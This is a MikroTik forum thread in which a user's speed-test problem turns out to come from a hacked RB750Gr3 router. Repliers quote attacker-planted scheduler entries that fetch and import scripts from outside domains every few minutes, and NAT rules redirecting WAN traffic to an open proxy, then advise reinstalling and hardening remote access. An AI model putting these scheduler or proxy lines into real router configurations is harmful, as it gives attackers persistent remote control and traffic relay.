Community discussions

MikroTik App
 
KashifAA
just joined
Topic Author
Posts: 13
Joined: Thu Oct 08, 2020 8:22 pm

Ookla Speed Test with RB750gr3

Thu Apr 22, 2021 8:51 pm

Hi,

We are using RB3011UiAS (RouterOS 6.48.1) for our enterprise network.

Three ports are configured into WAN List and remaining ones bridged for LAN.

The 2/3 WAN connections are directly terminated through fiber converter with Public IPs (with local and remote IPs assignment) and 3rd one is GPON shared link, and terminated through CPE with static private IP from the pool of Huawei GPON CPE DHCP server, but again we had acquired a public IP onto this link as well.

Recently we had configured RB750Gr3(RouterOS 6.48) as a backup of the above device, and replicated all config of the above router.

The problem we are facing now is that from RB750, we are unable to Speed Test from ookla, as when we open the site, it stuck at "finding the optimal Sever" and never get any server and in that scenario, when we hiot the Go button, the test never runs.

Please advice if there is any particular command for RB750Gr3 to do so, what can be the alternative for that.
 
erlinden
Forum Guru
Forum Guru
Posts: 1920
Joined: Wed Jun 12, 2013 1:59 pm
Location: Netherlands

Re: Ookla Speed Test with RB750gr3

Thu Apr 22, 2021 9:03 pm

Make sure that you use the same RouterOS version (and consider using LTS instead of stable).
To compare please post configs from both devices (/export hide-sensitive file=anynameyoulike)
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3291
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Ookla Speed Test with RB750gr3

Thu Apr 22, 2021 10:16 pm

Its not a hardware error, since my RB750Gr3 runes Ookla Speed test without any problem.
Here is a test on my 100/100 fiber line.
Its limited for one user to max 90Mbps download and 80Mbps upload. (without limit, I get close to 100/100)
.
speed_test.jpg
You do not have the required permissions to view the files attached to this post.
 
KashifAA
just joined
Topic Author
Posts: 13
Joined: Thu Oct 08, 2020 8:22 pm

Re: Ookla Speed Test with RB750gr3

Fri Apr 23, 2021 5:03 pm

Make sure that you use the same RouterOS version (and consider using LTS instead of stable).
To compare please post configs from both devices (/export hide-sensitive file=anynameyoulike)
Here you can find the required file.

Appreciate your review and comment on it.
You do not have the required permissions to view the files attached to this post.
 
KashifAA
just joined
Topic Author
Posts: 13
Joined: Thu Oct 08, 2020 8:22 pm

Re: Ookla Speed Test with RB750gr3

Mon Apr 26, 2021 9:40 am

Is there any Guru to understand this and figure out the issue??
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Ookla Speed Test with RB750gr3  [SOLVED]

Mon Apr 26, 2021 11:10 am

No Guru needed.
Since you have this in your config, your device was hacked:
/system scheduler
add interval=10m name=U7 on-event="/tool fetch url=http://globalmoby.xyz/poll/\
    c0823205-f6e9-49d0-8b89-06f7f803960f mode=http dst-path=7xe7zt46hb08\r\
    \n/import 7xe7zt46hb08" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/02/1970 start-time=05:49:58
add interval=10m name=U7 on-event="/tool fetch url=http://globalmoby.xyz/poll/\
    c0823205-f6e9-49d0-8b89-06f7f803960f mode=http dst-path=7xe7zt46hb08\r\
    \n/import 7xe7zt46hb08" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/02/1970 start-time=06:33:03
add interval=3m name=U6 on-event="/tool fetch url=http://myfrance.xyz/poll/336\
    aeb38-9b06-40ed-9e1e-5d74d38d2873 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/02/1970 start-time=07:12:21
Therefore your posted config can't be trusted.
Netinstall the device and reconfigure it from scratch.
Then come back.
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3291
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Ookla Speed Test with RB750gr3

Mon Apr 26, 2021 11:26 am

Since your router has 6.48, you have upgraded after it was hacked, so you have had this problem some time.
Problem is that there was som older version of RouterOS that was open for attack when winbox was open from internet.

I have posted this information several times on the forum.

-----------------------------------------------
Do you need to administrate the router from the outside?

If yes, VPN is the way to go for Router admin from the outside.

If VPN is not possible to use, then to access the route:

1. Use another port than default.
2. Use port knocking. This prevents someone from seeing open ports.
3. Use a long and good password.
4. Use access list to prevent any random internet from accessing your router.
5. Log everything. (See my signature for example.)
6. If possible, setup a remote router and make all routers (to administrate) connect to it using VPN to an admin the router.
7.++++


----------------------------

I guess its not normal to use proxy as well, so all this is part of a hack as well.
PS it does not help to just delete lines in config or use a restore. As Znevna write, netinstall is the only way to go (or replace the router)
/ip firewall nat
add action=redirect chain=dstnat dst-port=7001 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8020 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8080 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8000 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8050 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=7003 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=7005 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=9502 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8005 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8070 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=9999 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=8010 in-interface-list=WAN \
    protocol=tcp to-ports=8081
add action=redirect chain=dstnat dst-port=80 in-interface-list=WAN protocol=\
    tcp to-ports=8081
add action=masquerade chain=srcnat src-address=192.168.89.0/24

/ip proxy
set enabled=yes port=8081

/ip proxy access
add dst-address=192.168.0.0/16 dst-port=0-65535 src-address=0.0.0.0/0
add dst-address=0.0.0.0/0 dst-port=0-65535 src-address=192.168.0.0/16
add dst-address=10.0.0.0/8 dst-port=0-65535 src-address=0.0.0.0/0
add action=deny dst-address=0.0.0.0/0 dst-port=0-65535 src-address=0.0.0.0/0

Who is online

Users browsing this forum: Ahrefs [Bot], Bing [Bot], GoogleOther [Bot], Joseph and 83 guests